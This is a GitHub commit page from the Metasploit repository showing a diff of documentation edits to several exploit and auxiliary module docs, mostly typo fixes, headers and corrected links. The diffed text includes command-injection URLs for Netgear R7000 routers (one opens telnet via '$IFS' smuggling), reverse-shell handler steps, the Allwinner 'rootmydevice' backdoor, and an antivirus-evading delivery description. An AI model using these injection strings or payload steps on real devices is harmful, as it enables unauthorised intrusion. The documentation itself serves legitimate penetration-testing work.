Skip to content

Commit 6721b79

Browse files
committed
Land rapid7#9493 updates to various docs
2 parents b247b8e + e5b490c commit 6721b79

26 files changed

+90
-65
lines changed

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
1-
MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
1+
## Introduction
2+
3+
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
24

35
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
46

documentation/modules/auxiliary/gather/censys_search.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
33
## Verification Steps
44

55
1. Do: `use auxiliary/gather/censys_search`
6-
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
7-
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
6+
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
7+
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
88
4. Do: `set CENSYS_SEARCHTYPE certificates`
9-
5: Do: `set CENSYS_DORK rapid7`
9+
5: Do: `set CENSYS_DORK query`
1010
6: Do: `run`
1111

1212
## Scenarios

documentation/modules/auxiliary/gather/shodan_honeyscore.md

Lines changed: 10 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,9 @@
1-
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not.
2-
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
1+
## Introduction
2+
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
3+
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
34

4-
#### NOTE:
5-
In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
5+
#### NOTE:
6+
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
67

78
## Verification Steps
89

@@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
1112
3. Do: `set TARGET <targetip>`
1213
4. Do: `set SHODAN_APIKEY <your apikey>`
1314
5. Do: `run`
14-
6. If the API is up, you should recieve a score from 0.0 to 1.0.
15+
6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
1516

1617
## Options
1718

1819
**TARGET**
19-
20+
2021
The remote host to request the API to scan.
21-
22+
2223
**SHODAN_APIKEY**
2324

24-
This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
25-
25+
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
26+
2627

2728
## Scenarios
2829

documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,8 +7,8 @@
77
1. start `msfconsole`
88
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
99
3. `set RHOST 192.168.1.1` `<--- Router IP`
10-
4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
11-
5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
10+
4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
11+
5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
1212
5. `set PAYLOAD cmd/unix/reverse_bash`
1313
6. `set LHOST 192.168.1.x`
1414
7. `set LPORT xxxx`

documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
1-
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
1+
## Introduction
2+
The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
23

34

45
## Vulnerable Application

documentation/modules/exploit/multi/fileformat/office_word_macro.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
7575

7676
## Options
7777

78-
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
78+
**CUSTOMTEMPLATE**
79+
80+
A docx file that will be used as a template to build the exploit.
7981

8082
## Trusted Document
8183

documentation/modules/exploit/multi/local/allwinner_backdoor.md

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,12 @@
1-
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
2-
Vulnerable OS: all OS images available for Orange Pis,
1+
## Introduction
2+
3+
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
4+
Vulnerable OS: all OS images available for Orange Pis,
35
any for FriendlyARM's NanoPi M1,
46
SinoVoip's M2+ and M3,
57
Cuebietech's Cubietruck +
68
Linksprite's pcDuino8 Uno
7-
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
9+
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
810

911
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
1012

documentation/modules/exploit/multi/script/web_delivery.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,13 @@
1+
## Introduction
2+
13
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
24

35
The web_delivery module supports three different languages for delivery: Python, PHP, and
46
Powershell. You should manually select the correct target based on the victim environment you are exploiting.
57

68
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
79

10+
811
## Verification Steps
912

1013
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:

documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md

Lines changed: 1 addition & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -7,16 +7,14 @@ A fix was released in the June 2017 Patch Tuesday.
77

88
## Vulnerable Setup
99

10-
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
11-
10+
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
1211
## Verification Steps
1312

1413
### Start a handler
1514
1. `use exploit/multi/handler`
1615
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
1716
3. `set LHOST [ip victim connects back to]`
1817
4. `exploit -j`
19-
5. `back`
2018

2119
### Run the exploit
2220

documentation/modules/exploit/windows/fileformat/office_dde_delivery.md

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,3 @@
1-
21
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
32

43
## Vulnerable Application

0 commit comments

Comments
 (0)